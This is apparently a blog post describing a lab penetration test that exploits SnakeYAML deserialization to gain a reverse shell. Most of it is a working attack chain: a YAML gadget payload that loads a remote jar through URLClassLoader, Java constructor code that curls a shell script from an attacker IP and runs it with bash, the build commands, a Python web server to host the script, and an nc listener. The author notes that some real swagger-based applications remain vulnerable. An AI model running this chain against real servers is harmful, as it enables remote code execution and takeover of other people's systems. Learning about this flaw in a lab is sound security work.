Snake YAML for Reverse SHELL

Hi Brother,

I want to share a short journey during my Pentesting in the lab to keep me updated. I want to share the vulnerability here is not new, but it is quite easy to be exploited and very straightforward. I also found that some swagger yaml based applications still vulnerable to this

During the enumeration of an application, I found that the application give an error message that allow me to find some good information where this application is using yaml parser from snakeyaml

Based on the above information then I found a good article that telling this yaml parser library has vulnerability on the deserialization https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/ where with the code below then you can actually invoke a remote command execution

This is the exploit that we can develop for the test, We can download it from https://github.com/artsploit/yaml-payload

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]

So whenever I put them in parser then then remote command execution is triggered

In the above picture we can see that whenever the snakeyaml does the parsing then the remote code execution is triggered

Lets weaponized the payload. Lets look into the AwesomeScriptEngineFactory.java in order to trigger the reverse shell.

public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("curl http://10.10.14.40:8009/revshell.sh -o /tmp/revshell.sh");
            Runtime.getRuntime().exec("bash /tmp/revshell.sh");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

Above is my code in order to download the reverse shell and execute it in the server.

Do not forget to compile AwesomeScriptEngineFactory.java into jar file

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

This is the reverse shell command that I saved in the revshell.sh file that is going to be download and executed in the server

So whenever all the above is ready then I need to setup the http server in order to host the revshell.sh

python3 -m http.server 8009                                                                                                                                                                                                        Serving HTTP on 0.0.0.0 port 8009 (http://0.0.0.0:8009/) ..

and the next is to run the nc server to listen the reverse shell connection

nc -nlvp 9090   
listening on [any] 9090 ...

Lets execute the attack and wait for the reverse shell to connect back to us

and now the reverse connection has been established

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s